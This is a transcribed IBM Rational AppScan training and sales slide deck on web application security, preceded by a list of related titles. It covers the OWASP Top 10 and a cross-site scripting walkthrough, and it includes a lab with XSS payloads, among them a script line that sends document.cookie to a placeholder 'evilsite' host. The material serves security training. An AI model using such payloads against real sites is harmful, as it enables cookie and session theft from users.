Rational AppScan & Ounce Products



Similar documents
Securing Your Web Application against security vulnerabilities. Ong Khai Wei, IT Specialist, Development Tools (Rational) IBM Software Group

The Top Web Application Attacks: Are you vulnerable?

Web Applications The Hacker s New Target

National Information Security Group The Top Web Application Hack Attacks. Danny Allan Director, Security Research

New IBM Security Scanning Software Protects Businesses From Hackers

WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats

Where every interaction matters.

Staying a step ahead of the hackers: the importance of identifying critical Web application vulnerabilities.

Reducing Application Vulnerabilities by Security Engineering

WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY

Web Application Penetration Testing

Passing PCI Compliance How to Address the Application Security Mandates

WEB APPLICATION SECURITY

ETHICAL HACKING APPLICATIO WIRELESS110 00NETWORK APPLICATION MOBILE MOBILE0001

OWASP Top Ten Tools and Tactics

05.0 Application Development

WHITE PAPER FORTIWEB WEB APPLICATION FIREWALL. Ensuring Compliance for PCI DSS 6.5 and 6.6

Overview of the Penetration Test Implementation and Service. Peter Kanters

FINAL DoIT v.8 APPLICATION SECURITY PROCEDURE

Learning objectives for today s session

Six Essential Elements of Web Application Security. Cost Effective Strategies for Defending Your Business

Black Box versus White Box: Different App Testing Strategies John B. Dickson, CISSP

WHITE PAPER. FortiWeb Web Application Firewall Ensuring Compliance for PCI DSS 6.5 and 6.6

Web application security

Table of Contents. Page 2/13

(WAPT) Web Application Penetration Testing

Web Application Report

The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.

Using Free Tools To Test Web Application Security

OWASP AND APPLICATION SECURITY

How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh

Detecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008

Magento Security and Vulnerabilities. Roman Stepanov

ArcGIS Server Security Threats & Best Practices David Cordes Michael Young

FINAL DoIT v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES

Hack Proof Your Webapps

Integrating Security Testing into Quality Control

What is Web Security? Motivation

Barracuda Web Site Firewall Ensures PCI DSS Compliance

Web Application Security Assessment and Vulnerability Mitigation Tests

THE SMARTEST WAY TO PROTECT WEBSITES AND WEB APPS FROM ATTACKS

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011

Testing the OWASP Top 10 Security Issues

Adobe Systems Incorporated

A Network Administrator s Guide to Web App Security

Criteria for web application security check. Version

Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH January 17, Mega Conference

Web Security. Discovering, Analyzing and Mitigating Web Security Threats

WEB APPLICATION FIREWALLS: DO WE NEED THEM?

Web Engineering Web Application Security Issues

State of The Art: Automated Black Box Web Application Vulnerability Testing. Jason Bau, Elie Bursztein, Divij Gupta, John Mitchell

OWASP and OWASP Top 10 (2007 Update) OWASP. The OWASP Foundation. Dave Wichers. The OWASP Foundation. OWASP Conferences Chair

Excellence Doesn t Need a Certificate. Be an. Believe in You AMIGOSEC Consulting Private Limited

MANAGED SECURITY TESTING

Network Test Labs (NTL) Software Testing Services for igaming

WebGoat for testing your Application Security tools

CSUSB Web Application Security Standard CSUSB, Information Security & Emerging Technologies Office

Application Layer Encryption: Protecting against Application Logic and Session Theft Attacks. Whitepaper

SQuAD: Application Security Testing

Information Security Services

External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION

Members of the UK cyber security forum. Soteria Health Check. A Cyber Security Health Check for SAP systems

Web Application Security

KASPERSKY SECURITY INTELLIGENCE SERVICES. EXPERT SERVICES.

CORE Security and the Payment Card Industry Data Security Standard (PCI DSS)

Detecting and Defending Against Security Vulnerabilities for Web 2.0 Applications

Introduction:... 1 Security in SDLC:... 2 Penetration Testing Methodology: Case Study... 3

PCI-DSS and Application Security Achieving PCI DSS Compliance with Seeker

SecurityMetrics Vision whitepaper

Sitefinity Security and Best Practices

Web application security Executive brief Managing a growing threat: an executive s guide to Web application security.

Contemporary Web Application Attacks. Ivan Pang Senior Consultant Edvance Limited

elearning for Secure Application Development

Penetration Testing Service. By Comsec Information Security Consulting

3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management

Columbia University Web Security Standards and Practices. Objective and Scope

Application Security Best Practices. Wally LEE Principal Consultant

Application and Database Security with F5 BIG-IP ASM and IBM InfoSphere Guardium

Essential IT Security Testing

Web Application Attacks and Countermeasures: Case Studies from Financial Systems

How to achieve PCI DSS Compliance with Checkmarx Source Code Analysis

ITEC441- IS Security. Chapter 15 Performing a Penetration Test

Certified Ethical Hacker Exam Version Comparison. Version Comparison

Chapter 1 Web Application (In)security 1

ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST

Mean Time to Fix (MTTF) IT Risk s Dirty Little Secret Joe Krull, CPP, CISSP, IAM, CISA, A.Inst.ISP, CRISC, CIPP

Web Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure

Don t Get Burned! Are you Leaving your Critical Applications Defenseless?

Strategic Information Security. Attacking and Defending Web Services

The Key to Secure Online Financial Transactions

SERENA SOFTWARE Serena Service Manager Security

Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security

WEB APPLICATION SECURITY

Nuclear Regulatory Commission Computer Security Office Computer Security Standard

Transcription:

IBM Software Group Rational AppScan & Ounce Products Presenters Tony Sisson and Frank Sassano 2007 IBM Corporation

IBM Software Group The Alarming Truth CheckFree warns 5 million customers after hack http://infosecurity.us/?p=5168 January 9, 2009 Hannaford Bros. Grocery Chain 4 million credit & debit cards exposed http://www.cnn.com/2008/us/03/18/retail.data.breach.ap/index.html March 18, 2008 Montgomery Ward 51,000 customer credit card numbers... http://www.scmagazineus.com/report-montgomery-ward-fails-to-alert-victims-of-breach/article/111922/ June 27, 2008 Target Stores Blind users win $6M suite; Target to make website accessible http://digg.com/tech_news/blind_users_win_6m_suit_target_to_make_website_accessible 2008 2

IBM Software Group The Alarming Truth CheckFree warns 5 million customers after hack http://infosecurity.us/?p=5168 January 9, 2009 Hannaford Bros. Grocery Chain 4 million credit & debit cards exposed http://www.cnn.com/2008/us/03/18/retail.data.breach.ap/index.html March 18, 2008 Montgomery Ward 51,000 customer credit card numbers... http://www.scmagazineus.com/report-montgomery-ward-fails-to-alert-victims-of-breach/article/111922/ June 27, 2008 Target Stores Blind users win $6M suite; Target to make website accessible http://digg.com/tech_news/blind_users_win_6m_suit_target_to_make_website_accessible 2008 2

IBM Software Group Bad Press Decreases Shareholder Value One-day market cap drop of $200M 3

IBM Software Group Rational software The Reality: Security and Focus Are Unbalanced Security Security Spending 75% 10% % of Attacks Web Applications % of Dollars 90% 25% Network Server of All Attacks on Information Security 75% Are Directed to the Web Application Layer 2/3 of All Web Applications Are Vulnerable 2

IBM Software Group The Myth: Our Site Is Safe Security 5

IBM Software Group The Myth: Our Site Is Safe Security We Have Firewalls in Place We Audit It Once a Quarter with Pen Testers We Use Network Vulnerability Scanners 5

IBM Software Group Rational software High Level Web Application Architecture Review Internet Client Tier Firewall (Browser) (Presentation) App Server (Business Database Middle Tier Logic) Data Tier 3

IBM Software Group Rational software High Level Web Application Architecture Review Customer App is deployed here Internet Client Tier Firewall (Browser) (Presentation) App Server (Business Database Middle Tier Logic) Data Tier 3

IBM Software Group Rational software High Level Web Application Architecture Review Customer App is deployed here Sensitive data is stored here Internet Client Tier Firewall (Browser) (Presentation) App Server (Business Database Middle Tier Logic) Data Tier 3

IBM Software Group Rational software High Level Web Application Architecture Review Customer App is deployed here Sensitive data is stored here Internet Client Tier Firewall (Browser) (Presentation) App Server (Business Database Protects Network Middle Tier Logic) Data Tier 3

IBM Software Group Rational software High Level Web Application Architecture Review Customer App is deployed here Sensitive data is stored here Internet Client Tier Firewall (Browser) SSL (Presentation) App Server (Business Database Protects Transport Protects Network Middle Tier Logic) Data Tier 3

IBM Software Group Rational software High Level Web Application Architecture Review Customer App is deployed here Sensitive data is stored here Internet Client Tier Firewall (Browser) SSL (Presentation) App Server (Business Database Protects Transport Protects Network Middle Tier Logic) Data Tier 3

IBM Software Group Rational software Network Defenses for Web Applications Security Perimeter IDS IPS App Firewall Firewall Intrusion Intrusion Application HTTP Detection System Prevention System Firewall designed to (fail securely) by allowing through traffic that they don't understand Request System Incident Event Management (SIEM) 4

IBM Software Group Rational software Security Testing Technologies Primer Static Code Analysis = Whitebox - Looking at the code for security issues (code-level scanning) Total Potential Security Issues Dynamic Analysis = Blackbox - Sending tests to a functioning application Static Analysis Dynamic Analysis 6

IBM Software Group Building Security & Compliance into the Software SDLC Coding Build QA Security Production Developers Enable Security to effectively drive remediation into development Developers Developers Provides Developers and Testers with expertise on detection and remediation ability Ensure vulnerabilities are addressed before applications are put into production 9

IBM Software Group Rational software Rational AppScan End-to-End Web Application Security REQUIREMENTS CODE BUILD QA SECURITY PRODUCTION Req ts Definition (security templates) Ounce Products - Eclipse/VS IDE AppScan Tester (scan agent & clients) AppScan Enterprise / Reporting Console (enterprise-wide scanning and reporting) AppScan Standard (desktop) AppScan OnDemand (SaaS) Security requirements defined before design & implementation Build security testing into the IDE* Automate Security / Compliance testing in the Build Process Security / compliance testing incorporated into testing & remediation workflows Security & Compliance Testing, oversight, control, policy, audits Outsourced testing for security audits & production site monitoring Application Security Best Practices Address security from the start Security audit solutions for IT Security Security for the development lifecycle 5

IBM Software Group Open Web Application Security Project (OWASP) Top10 Application Threat Negative Impact Example Impact Cross-Site scripting Injection Flaws Malicious File Execution Insecure Direct Object Reference Cross-Site Request Forgery Information Leakage and Improper Error Handling Broken Authentication & Session Management Insecure Cryptographic Storage Insecure Communications Identity Theft, Sensitive Information Leakage, Attacker can manipulate queries to the DB / LDAP / Other system Execute shell commands on server, up to full control Attacker can access sensitive files and resources Attacker can invoke blind actions on Web applications, impersonating as a trusted user Attackers can gain detailed system information Session tokens not guarded or invalidated properly Weak encryption techniques may lead to broken encryption Sensitive info sent unencrypted over insecure channel Hackers can impersonate legitimate users, and control their accounts. Hackers can access backend database information, alter it or steal it. Site modified to transfer all interactions to the hacker. Web application returns contents of sensitive file (instead of harmless one) Blind requests to bank account transfer money to hacker Malicious system reconnaissance may assist in developing further attacks Hacker can force session token on victim; session tokens can be stolen after logout Confidential information (SSN, Credit Cards) can be decrypted by malicious users Unencrypted credentials sniffed and used by hacker to impersonate user Failure to Restrict URL Access Hacker can access unauthorized Hacker can forcefully browse and access a page resources past the login page 11

IBM Software Group Cross-Site Scripting The Exploit Process Evil.org User bank.com 12

IBM Software Group Cross-Site Scripting The Exploit Process Evil.org 1) Link to bank.com sent to user via E-mail or HTTP User bank.com 12

IBM Software Group Cross-Site Scripting The Exploit Process Evil.org 1) Link to bank.com sent to user via E-mail or HTTP User 2) User sends script embedded as data bank.com 12

IBM Software Group Cross-Site Scripting The Exploit Process Evil.org 1) Link to bank.com sent to user via E-mail or HTTP User 2) User sends script embedded as data 3) Script/data returned, executed by browser bank.com 12

IBM Software Group Cross-Site Scripting The Exploit Process Evil.org 1) Link to bank.com sent to user via E-mail or HTTP User 4) Script sends user s cookie and session information without the user s consent or knowledge 2) User sends script embedded as data bank.com 3) Script/data returned, executed by browser 12

IBM Software Group Cross-Site Scripting The Exploit Process Evil.org 1) Link to bank.com sent to user via E-mail or HTTP User 4) Script sends user s cookie and session information without the user s consent or knowledge 5) Evil.org uses stolen session information to impersonate user 2) User sends script embedded as data 3) Script/data returned, executed by browser bank.com 12

Lab 1 IBM Software Group Profile Web Application, Steal Cookies The Goal of this lab is to: profile the demo.testfire.net application utilize a Cross-Site Scripting vulnerability on the demo.testfire.net application in order to access cookies on a target user s browser Search Super Bowl <B>Super Bowl</B> <script>alert(1)</script> <script>alert(document.cookie)</script> Tamperdata - for gathering the Cookie information to send to Grandma! SEARCH - <script>document.write('<img src=http:// evilsite/'+document.cookie);</script> 13

IBM Software Group SQL Injection Example 14

IBM Software Group SQL Injection Example 15

IBM Software Group SQL Injection Example - Exploit 16

IBM Software Group SQL Injection Example - Outcome 17

IBM Software Group Information Leakage Different User/Pass Error verbose login error messages 18

IBM Software Group Failure to Restrict URL Access - Admin User login Privilege Escalation Example 19

IBM Software Group Failure to Restrict URL Access - Admin User login Privilege Escalation Example /admin/admin.aspx 19

IBM Software Group Forcefully browse to admin page 20

IBM Software Group Rational AppScan s HTTP-Based Malware Scanning 1. Discover all content and links in a Web Application Execute JavaScript & Flash Fill forms and login sequences Analyze secure pages 21 IBM Confidential

IBM Software Group Rational AppScan s HTTP-Based Malware Scanning 1. Discover all content and links in a Web Application Execute JavaScript & Flash Fill forms and login sequences Analyze secure pages 21 IBM Confidential

IBM Software Group Rational AppScan s HTTP-Based Malware Scanning 1. Discover all content and links in a Web Application Execute JavaScript & Flash Fill forms and login sequences Analyze secure pages 2. Analyze all content for malicious behavior indicators 3. Compare all links to comprehensive black-lists 21 IBM Confidential

IBM Software Group Rational AppScan s HTTP-Based Malware Scanning 1. Discover all content and links in a Web Application Execute JavaScript & Flash Fill forms and login sequences Analyze secure pages 2. Analyze all content for malicious behavior indicators 3. Compare all links to comprehensive black-lists link1 link2 link3 21 IBM Confidential

IBM Software Group Rational AppScan s HTTP-Based Malware Scanning 1. Discover all content and links in a Web Application Execute JavaScript & Flash Fill forms and login sequences Analyze secure pages 2. Analyze all content for malicious behavior indicators 3. Compare all links to comprehensive black-lists link1 link2 link3 21 IBM Confidential

IBM Software Group Introducing expanded Rational AppScan OnDemand: Comprehensive testing of pre-production applications Periodic assessment of applications in QA or Security Monthly scans Flexible offerings (Small/Medium/Large) AppScan Tester OnDemand Production Site Monitoring: Continuous scanning of production Web sites for vulnerabilities that may have been introduced after the app went live Dynamic or interactive content and forms, online registrations Weekly scans The Result: Ability to address online risk without in-house resources with the faster route to actionable information 22

IBM Software Group Introducing expanded Rational AppScan/Policy Tester OnDemand AppScan OnDemand: Comprehensive testing of pre-production applications Periodic assessment of applications in QA or Security Monthly scans Flexible offerings (Small/Medium/Large) AppScan Tester OnDemand Production Site Monitoring: Continuous scanning of production Web sites for vulnerabilities that may have been introduced after the app went live Dynamic or interactive content and forms, online registrations Weekly scans The Result: Ability to address online risk without in-house resources with the faster route to actionable information 22

IBM Software Group Watchfire Solutions IBM Software Group Rational software The Impact of Securing Flash-based Applications Flash one of the fastest growing security problems Practically in every web application Flash vulnerabilities: Cross-Site Flashing Cross-Site Scripting through Flash Phishing Flow Manipulation 2008 IBM Corporation

IBM Software Group Watchfire Solutions IBM Software Group Rational software The Impact of Securing Flash-based Applications Flash one of the fastest growing security problems Practically in every web application Flash vulnerabilities: Cross-Site Flashing Cross-Site Scripting through Flash Phishing Flow Manipulation 2008 IBM Corporation

IBM Software Group Watchfire Solutions IBM Software Group Rational software The Impact of Securing Flash-based Applications Flash one of the fastest growing security problems Practically in every web application Flash vulnerabilities: Cross-Site Flashing Cross-Site Scripting through Flash Phishing Flow Manipulation Flex Next-Generation of Flash 2008 IBM Corporation

IBM Software Group Watchfire Solutions IBM Software Group Rational software The Impact of Securing Flash-based Applications Flash one of the fastest growing security problems Practically in every web application Flash vulnerabilities: Cross-Site Flashing Cross-Site Scripting through Flash Phishing Flow Manipulation Flex Next-Generation of Flash Marketing Flash Banner Compromises the entire web application 2008 IBM Corporation

IBM Software Group Rational software 7

IBM Software Group Rational software 8

IBM Software Group Rational software 9

IBM Software Group Rational software 9

IBM Software Group 28

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information